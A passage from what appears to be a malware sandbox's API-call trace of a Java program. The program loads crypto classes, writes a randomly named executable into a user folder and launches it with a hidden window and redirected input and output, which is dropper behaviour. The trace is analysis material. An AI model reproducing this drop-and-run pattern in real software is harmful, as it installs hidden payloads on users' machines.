nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c400, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208c400*=0xa0, lpOverlapped=0x0) returned 1 [0120.616] malloc (_Size=0x2a) returned 0x12ef4cd0 [0120.617] strlen (_Str="javax/crypto/NoSuchPaddingException.class") returned 0x29 [0120.617] strcpy (in: _Dest=0x208c5b0, _Source="javax/crypto/NoSuchPaddingException.class" | out: _Dest="javax/crypto/NoSuchPaddingException.class") returned="javax/crypto/NoSuchPaddingException.class" [0120.617] malloc (_Size=0x1bf0) returned 0x12ef5680 [0120.617] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x99ed, lpNewFilePointer=0x208af40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208af40*=39405) returned 1 [0120.617] ReadFile (in: hFile=0x2c8, lpBuffer=0x208af90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208af10, lpOverlapped=0x0 | out: lpBuffer=0x208af90*, lpNumberOfBytesRead=0x208af10*=0x1e, lpOverlapped=0x0) returned 1 [0120.617] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x9a34, lpNewFilePointer=0x208afa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208afa0*=39476) returned 1 [0120.617] ReadFile (in: hFile=0x2c8, lpBuffer=0x208b090, nNumberOfBytesToRead=0x129, lpNumberOfBytesRead=0x208af70, lpOverlapped=0x0 | out: lpBuffer=0x208b090*, lpNumberOfBytesRead=0x208af70*=0x129, lpOverlapped=0x0) returned 1 [0120.617] malloc (_Size=0x8000) returned 0x12f3a0c0 [0120.618] free (_Block=0x12ef4c90) [0120.618] free (_Block=0x12e60b40) [0120.622] strlen (_Str="java/lang/NumberFormatException") returned 0x1f [0120.622] strlen (_Str="java/lang/NumberFormatException.class") returned 0x25 [0120.623] malloc (_Size=0x48) returned 0x12e60b40 [0120.623] malloc (_Size=0xa0) returned 0x12dabf70 [0120.623] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340507c, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=54546556) returned 1 [0120.623] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208c300*=0xa0, lpOverlapped=0x0) returned 1 [0120.628] malloc (_Size=0x26) returned 0x12ddad70 [0120.629] strlen (_Str="java/lang/NumberFormatException.class") returned 0x25 [0120.629] strcpy (in: _Dest=0x208c4b0, _Source="java/lang/NumberFormatException.class" | out: _Dest="java/lang/NumberFormatException.class") returned="java/lang/NumberFormatException.class" [0120.629] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ddf247, lpNewFilePointer=0x208bf30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf30*=48099911) returned 1 [0120.629] ReadFile (in: hFile=0x134, lpBuffer=0x208bf80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf00, lpOverlapped=0x0 | out: lpBuffer=0x208bf80*, lpNumberOfBytesRead=0x208bf00*=0x1e, lpOverlapped=0x0) returned 1 [0120.630] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ddf28a, lpNewFilePointer=0x208bf90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf90*=48099978) returned 1 [0120.630] ReadFile (in: hFile=0x134, lpBuffer=0x1231bd60, nNumberOfBytesToRead=0x25f, lpNumberOfBytesRead=0x208bf60, lpOverlapped=0x0 | out: lpBuffer=0x1231bd60*, lpNumberOfBytesRead=0x208bf60*=0x25f, lpOverlapped=0x0) returned 1 [0120.631] free (_Block=0x12ef4b10) [0120.631] free (_Block=0x12e60640) [0120.677] strlen (_Str="com/sun/crypto/provider/PKCS5Padding") returned 0x24 [0120.679] malloc (_Size=0x48) returned 0x12e60640 [0120.679] malloc (_Size=0xa0) returned 0x12dac390 [0120.679] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x42070, lpNewFilePointer=0x208c490, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c490*=270448) returned 1 [0120.679] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c460, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208c460*=0xa0, lpOverlapped=0x0) returned 1 [0120.679] malloc (_Size=0x2b) returned 0x12ef53d0 [0120.680] free (_Block=0x12ddb0a0) [0120.680] free (_Block=0x12e5f100) [0120.682] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27ba4, lpNewFilePointer=0x208a690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a690*=162724) returned 1 [0120.682] ReadFile (in: hFile=0x2d0, lpBuffer=0x208a6e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a660, lpOverlapped=0x0 | out: lpBuffer=0x208a6e0*, lpNumberOfBytesRead=0x208a660*=0x1e, lpOverlapped=0x0) returned 1 [0120.682] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x27bec, lpNewFilePointer=0x208a6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a6f0*=162796) returned 1 [0120.682] ReadFile (in: hFile=0x2d0, lpBuffer=0x208a800, nNumberOfBytesToRead=0x2ca, lpNumberOfBytesRead=0x208a6c0, lpOverlapped=0x0 | out: lpBuffer=0x208a800*, lpNumberOfBytesRead=0x208a6c0*=0x2ca, lpOverlapped=0x0) returned 1 [0120.684] malloc (_Size=0x401) returned 0x12f512b0 [0120.689] free (_Block=0x12f512b0) [0120.700] strlen (_Str="java/security/MessageDigest") returned 0x1b [0120.704] strlen (_Str="javax/crypto/NullCipher.class") returned 0x1d [0120.705] strlen (_Str="javax/crypto/NullCipher.class") returned 0x1d [0120.705] malloc (_Size=0x48) returned 0x12e5fec0 [0120.705] malloc (_Size=0xa0) returned 0x12dac9c0 [0120.705] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1b763, lpNewFilePointer=0x208e5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5b0*=112483) returned 1 [0120.705] ReadFile (in: hFile=0x2c8, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e580, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208e580*=0xa0, lpOverlapped=0x0) returned 1 [0120.705] malloc (_Size=0x1e) returned 0x12dda890 [0120.705] strlen (_Str="javax/crypto/NullCipher.class") returned 0x1d [0120.706] strcpy (in: _Dest=0x208e730, _Source="javax/crypto/NullCipher.class" | out: _Dest="javax/crypto/NullCipher.class") returned="javax/crypto/NullCipher.class" [0120.706] malloc (_Size=0x1bf0) returned 0x12ef5680 [0120.706] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x111be, lpNewFilePointer=0x208d0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0c0*=70078) returned 1 [0120.706] ReadFile (in: hFile=0x2c8, lpBuffer=0x208d110, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d090, lpOverlapped=0x0 | out: lpBuffer=0x208d110*, lpNumberOfBytesRead=0x208d090*=0x1e, lpOverlapped=0x0) returned 1 [0120.706] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x111f9, lpNewFilePointer=0x208d120, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d120*=70137) returned 1 [0120.706] ReadFile (in: hFile=0x2c8, lpBuffer=0x208d210, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x208d0f0, lpOverlapped=0x0 | out: lpBuffer=0x208d210*, lpNumberOfBytesRead=0x208d0f0*=0xdb, lpOverlapped=0x0) returned 1 [0120.706] malloc (_Size=0x8000) returned 0x12f3a0c0 [0120.707] free (_Block=0x12ef4cd0) [0120.707] free (_Block=0x12e5ed90) [0120.712] strlen (_Str="java/lang/Math") returned 0xe [0121.102] strlen (_Str="java/util/Arrays") returned 0x10 [0121.106] strlen (_Str="java/io/File") returned 0xc [0121.107] wcslen (_String="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe") returned 0x22 [0121.107] malloc (_Size=0x50) returned 0x130616a0 [0121.107] wcscpy (in: _Dest=0x130616a0, _Source="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" | out: _Dest="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe") returned="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" [0121.107] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0121.109] free (_Block=0x130616a0) [0121.110] malloc (_Size=0x99000) returned 0x13257df0 [0121.116] WriteFile (in: hFile=0x2d4, lpBuffer=0x13257df0*, nNumberOfBytesToWrite=0x99000, lpNumberOfBytesWritten=0x208d5f0, lpOverlapped=0x0 | out: lpBuffer=0x13257df0*, lpNumberOfBytesWritten=0x208d5f0*=0x99000, lpOverlapped=0x0) returned 1 [0121.138] free (_Block=0x13257df0) [0121.147] CloseHandle (hObject=0x2d4) returned 1 [0121.177] strlen (_Str="java/lang/ProcessImpl.class") returned 0x1b [0121.177] malloc (_Size=0x48) returned 0x12e5eed0 [0121.177] malloc (_Size=0xa0) returned 0x12dac390 [0121.177] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33256d0, lpNewFilePointer=0x208e440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e440*=53630672) returned 1 [0121.177] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e410, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208e410*=0xa0, lpOverlapped=0x0) returned 1 [0121.179] malloc (_Size=0x1c) returned 0x12ddb1c0 [0121.179] strlen (_Str="java/lang/ProcessImpl.class") returned 0x1b [0121.180] strcpy (in: _Dest=0x208e5c0, _Source="java/lang/ProcessImpl.class" | out: _Dest="java/lang/ProcessImpl.class") returned="java/lang/ProcessImpl.class" [0121.180] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16b737b, lpNewFilePointer=0x208e040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e040*=23819131) returned 1 [0121.180] ReadFile (in: hFile=0x134, lpBuffer=0x208e090, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e010, lpOverlapped=0x0 | out: lpBuffer=0x208e090*, lpNumberOfBytesRead=0x208e010*=0x1e, lpOverlapped=0x0) returned 1 [0121.180] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16b73b4, lpNewFilePointer=0x208e0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0a0*=23819188) returned 1 [0121.181] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x2103, lpNumberOfBytesRead=0x208e070, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208e070*=0x2103, lpOverlapped=0x0) returned 1 [0121.184] free (_Block=0x12ddad70) [0121.185] free (_Block=0x12e60b40) [0121.194] strlen (_Str="java/lang/Process.class") returned 0x17 [0121.194] malloc (_Size=0x48) returned 0x12e60b40 [0121.194] malloc (_Size=0xa0) returned 0x12dabd60 [0121.194] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33250dd, lpNewFilePointer=0x208da00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da00*=53629149) returned 1 [0121.194] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d9d0, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208d9d0*=0xa0, lpOverlapped=0x0) returned 1 [0121.195] malloc (_Size=0x18) returned 0x12f4fca0 [0121.195] strlen (_Str="java/lang/Process.class") returned 0x17 [0121.195] strcpy (in: _Dest=0x208db80, _Source="java/lang/Process.class" | out: _Dest="java/lang/Process.class") returned="java/lang/Process.class" [0121.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16b1c92, lpNewFilePointer=0x208d600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d600*=23796882) returned 1 [0121.195] ReadFile (in: hFile=0x134, lpBuffer=0x208d650, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d5d0, lpOverlapped=0x0 | out: lpBuffer=0x208d650*, lpNumberOfBytesRead=0x208d5d0*=0x1e, lpOverlapped=0x0) returned 1 [0121.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16b1cc7, lpNewFilePointer=0x208d660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d660*=23796935) returned 1 [0121.198] ReadFile (in: hFile=0x134, lpBuffer=0x1324a0c0, nNumberOfBytesToRead=0x42b, lpNumberOfBytesRead=0x208d630, lpOverlapped=0x0 | out: lpBuffer=0x1324a0c0*, lpNumberOfBytesRead=0x208d630*=0x42b, lpOverlapped=0x0) returned 1 [0121.203] free (_Block=0x12ddb1c0) [0121.203] free (_Block=0x12e5eed0) [0121.215] strlen (_Str="java/lang/ProcessEnvironment.class") returned 0x22 [0121.215] malloc (_Size=0x48) returned 0x12e5ffb0 [0121.215] malloc (_Size=0xa0) returned 0x12dac390 [0121.215] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341941e, lpNewFilePointer=0x208e380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e380*=54629406) returned 1 [0121.215] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e350, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208e350*=0xa0, lpOverlapped=0x0) returned 1 [0121.216] malloc (_Size=0x23) returned 0x12dda7a0 [0121.217] strlen (_Str="java/lang/ProcessEnvironment.class") returned 0x22 [0121.220] strcpy (in: _Dest=0x208e500, _Source="java/lang/ProcessEnvironment.class" | out: _Dest="java/lang/ProcessEnvironment.class") returned="java/lang/ProcessEnvironment.class" [0121.221] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3121c4a, lpNewFilePointer=0x208df80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df80*=51518538) returned 1 [0121.221] ReadFile (in: hFile=0x134, lpBuffer=0x208dfd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df50, lpOverlapped=0x0 | out: lpBuffer=0x208dfd0*, lpNumberOfBytesRead=0x208df50*=0x1e, lpOverlapped=0x0) returned 1 [0121.226] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3121c8a, lpNewFilePointer=0x208dfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfe0*=51518602) returned 1 [0121.226] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x15b8, lpNumberOfBytesRead=0x208dfb0, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208dfb0*=0x15b8, lpOverlapped=0x0) returned 1 [0121.227] free (_Block=0x12f4fca0) [0121.227] free (_Block=0x12e60b40) [0121.234] malloc (_Size=0x48) returned 0x12e60b40 [0121.234] malloc (_Size=0xa0) returned 0x12dab260 [0121.234] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34193bf, lpNewFilePointer=0x208dce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dce0*=54629311) returned 1 [0121.234] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcb0, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208dcb0*=0xa0, lpOverlapped=0x0) returned 1 [0121.235] malloc (_Size=0x32) returned 0x12ef4b10 [0121.235] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3121846, lpNewFilePointer=0x208d8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8e0*=51517510) returned 1 [0121.236] ReadFile (in: hFile=0x134, lpBuffer=0x208d930, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8b0, lpOverlapped=0x0 | out: lpBuffer=0x208d930*, lpNumberOfBytesRead=0x208d8b0*=0x1e, lpOverlapped=0x0) returned 1 [0121.236] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3121895, lpNewFilePointer=0x208d940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d940*=51517589) returned 1 [0121.236] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x3b5, lpNumberOfBytesRead=0x208d910, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208d910*=0x3b5, lpOverlapped=0x0) returned 1 [0121.238] malloc (_Size=0x48) returned 0x12e5f970 [0121.238] malloc (_Size=0xa0) returned 0x12dac390 [0121.238] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341935f, lpNewFilePointer=0x208dce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dce0*=54629215) returned 1 [0121.238] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dcb0, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208dcb0*=0xa0, lpOverlapped=0x0) returned 1 [0121.239] malloc (_Size=0x33) returned 0x12ef4c90 [0121.239] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3121367, lpNewFilePointer=0x208d8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8e0*=51516263) returned 1 [0121.239] ReadFile (in: hFile=0x134, lpBuffer=0x208d930, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d8b0, lpOverlapped=0x0 | out: lpBuffer=0x208d930*, lpNumberOfBytesRead=0x208d8b0*=0x1e, lpOverlapped=0x0) returned 1 [0121.240] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31213b7, lpNewFilePointer=0x208d940, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d940*=51516343) returned 1 [0121.240] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x48f, lpNumberOfBytesRead=0x208d910, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208d910*=0x48f, lpOverlapped=0x0) returned 1 [0121.241] malloc (_Size=0x48) returned 0x12e60b40 [0121.241] malloc (_Size=0xa0) returned 0x12daace0 [0121.241] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419306, lpNewFilePointer=0x208dc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc80*=54629126) returned 1 [0121.242] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc50, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208dc50*=0xa0, lpOverlapped=0x0) returned 1 [0121.242] malloc (_Size=0x2c) returned 0x12ef4cd0 [0121.243] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31203d9, lpNewFilePointer=0x208d880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d880*=51512281) returned 1 [0121.243] ReadFile (in: hFile=0x134, lpBuffer=0x208d8d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d850, lpOverlapped=0x0 | out: lpBuffer=0x208d8d0*, lpNumberOfBytesRead=0x208d850*=0x1e, lpOverlapped=0x0) returned 1 [0121.244] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3120422, lpNewFilePointer=0x208d8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8e0*=51512354) returned 1 [0121.244] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0xf45, lpNumberOfBytesRead=0x208d8b0, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208d8b0*=0xf45, lpOverlapped=0x0) returned 1 [0121.245] GetEnvironmentStringsW () returned 0x433d40* [0121.245] FreeEnvironmentStringsW (penv=0x433d40) returned 1 [0121.246] malloc (_Size=0x48) returned 0x12e5fc90 [0121.246] malloc (_Size=0xa0) returned 0x12daaef0 [0121.246] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34191d0, lpNewFilePointer=0x208dba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dba0*=54628816) returned 1 [0121.247] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db70, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208db70*=0xa0, lpOverlapped=0x0) returned 1 [0121.247] malloc (_Size=0x33) returned 0x12ef4b10 [0121.248] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311b045, lpNewFilePointer=0x208d7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7a0*=51490885) returned 1 [0121.248] ReadFile (in: hFile=0x134, lpBuffer=0x208d7f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d770, lpOverlapped=0x0 | out: lpBuffer=0x208d7f0*, lpNumberOfBytesRead=0x208d770*=0x1e, lpOverlapped=0x0) returned 1 [0121.249] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311b095, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=51490965) returned 1 [0121.249] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x6c3, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208d7d0*=0x6c3, lpOverlapped=0x0) returned 1 [0121.250] malloc (_Size=0x48) returned 0x12e60b40 [0121.251] malloc (_Size=0xa0) returned 0x12dab890 [0121.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419120, lpNewFilePointer=0x208dba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dba0*=54628640) returned 1 [0121.251] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db70, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208db70*=0xa0, lpOverlapped=0x0) returned 1 [0121.251] malloc (_Size=0x35) returned 0x12ef4c90 [0121.252] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311a194, lpNewFilePointer=0x208d7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7a0*=51487124) returned 1 [0121.252] ReadFile (in: hFile=0x134, lpBuffer=0x208d7f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d770, lpOverlapped=0x0 | out: lpBuffer=0x208d7f0*, lpNumberOfBytesRead=0x208d770*=0x1e, lpOverlapped=0x0) returned 1 [0121.253] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x311a1e6, lpNewFilePointer=0x208d800, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d800*=51487206) returned 1 [0121.253] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x593, lpNumberOfBytesRead=0x208d7d0, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208d7d0*=0x593, lpOverlapped=0x0) returned 1 [0121.254] malloc (_Size=0x48) returned 0x12e5ef70 [0121.254] malloc (_Size=0xa0) returned 0x12daace0 [0121.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341901e, lpNewFilePointer=0x208db40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db40*=54628382) returned 1 [0121.254] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db10, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208db10*=0xa0, lpOverlapped=0x0) returned 1 [0121.255] malloc (_Size=0x30) returned 0x12ef4b10 [0121.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3119237, lpNewFilePointer=0x208d740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d740*=51483191) returned 1 [0121.255] ReadFile (in: hFile=0x134, lpBuffer=0x208d790, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d710, lpOverlapped=0x0 | out: lpBuffer=0x208d790*, lpNumberOfBytesRead=0x208d710*=0x1e, lpOverlapped=0x0) returned 1 [0121.256] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3119284, lpNewFilePointer=0x208d7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7a0*=51483268) returned 1 [0121.257] ReadFile (in: hFile=0x134, lpBuffer=0x13247e20, nNumberOfBytesToRead=0x595, lpNumberOfBytesRead=0x208d770, lpOverlapped=0x0 | out: lpBuffer=0x13247e20*, lpNumberOfBytesRead=0x208d770*=0x595, lpOverlapped=0x0) returned 1 [0121.261] GetStdHandle (nStdHandle=0xfffffff6) returned 0x20 [0121.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0121.261] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0121.261] GetHandleInformation (in: hObject=0x20, lpdwFlags=0x208f340 | out: lpdwFlags=0x208f340) returned 1 [0121.261] SetHandleInformation (hObject=0x20, dwMask=0x1, dwFlags=0x0) returned 1 [0121.261] GetHandleInformation (in: hObject=0x24, lpdwFlags=0x208f340 | out: lpdwFlags=0x208f340) returned 1 [0121.261] SetHandleInformation (hObject=0x24, dwMask=0x1, dwFlags=0x0) returned 1 [0121.261] GetHandleInformation (in: hObject=0x28, lpdwFlags=0x208f340 | out: lpdwFlags=0x208f340) returned 1 [0121.261] SetHandleInformation (hObject=0x28, dwMask=0x1, dwFlags=0x0) returned 1 [0121.261] CreatePipe (in: hReadPipe=0x208f388, hWritePipe=0x208f390, lpPipeAttributes=0x0, nSize=0x1018 | out: hReadPipe=0x208f388*=0x30c, hWritePipe=0x208f390*=0x310) returned 1 [0121.262] SetHandleInformation (hObject=0x30c, dwMask=0x1, dwFlags=0x1) returned 1 [0121.262] CreatePipe (in: hReadPipe=0x208f3a0, hWritePipe=0x208f3a8, lpPipeAttributes=0x0, nSize=0x1018 | out: hReadPipe=0x208f3a0*=0x314, hWritePipe=0x208f3a8*=0x318) returned 1 [0121.262] SetHandleInformation (hObject=0x318, dwMask=0x1, dwFlags=0x1) returned 1 [0121.262] CreatePipe (in: hReadPipe=0x208f370, hWritePipe=0x208f378, lpPipeAttributes=0x0, nSize=0x1018 | out: hReadPipe=0x208f370*=0x31c, hWritePipe=0x208f378*=0x320) returned 1 [0121.262] SetHandleInformation (hObject=0x320, dwMask=0x1, dwFlags=0x1) returned 1 [0121.262] GetConsoleWindow () returned 0x30338 [0121.272] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000400, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x208f400*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x30c, hStdOutput=0x318, hStdError=0x320), lpProcessInformation=0x208f3e8 | out: lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", lpProcessInformation=0x208f3e8*(hProcess=0x328, hThread=0x324, dwProcessId=0xde4, dwThreadId=0xde8)) returned 1 [0122.735] CloseHandle (hObject=0x324) returned 1 [0122.735] CloseHandle (hObject=0x320) returned 1 [0122.735] CloseHandle (hObject=0x318) returned 1 [0122.735] CloseHandle (hObject=0x30c) returned 1 [0122.735] SetHandleInformation (hObject=0x28, dwMask=0x1, dwFlags=0x1) returned 1 [0122.736] SetHandleInformation (hObject=0x24, dwMask=0x1, dwFlags=0x1) returned 1 [0122.736] SetHandleInformation (hObject=0x20, dwMask=0x1, dwFlags=0x1) returned 1 [0122.737] strlen (_Str="java/lang/ProcessImpl$2.class") returned 0x1d [0122.737] malloc (_Size=0x48) returned 0x12e60b40 [0122.737] malloc (_Size=0xa0) returned 0x12dab260 [0122.737] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3325630, lpNewFilePointer=0x208e560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e560*=53630512) returned 1 [0122.737] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e530, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208e530*=0xa0, lpOverlapped=0x0) returned 1 [0122.739] malloc (_Size=0x1e) returned 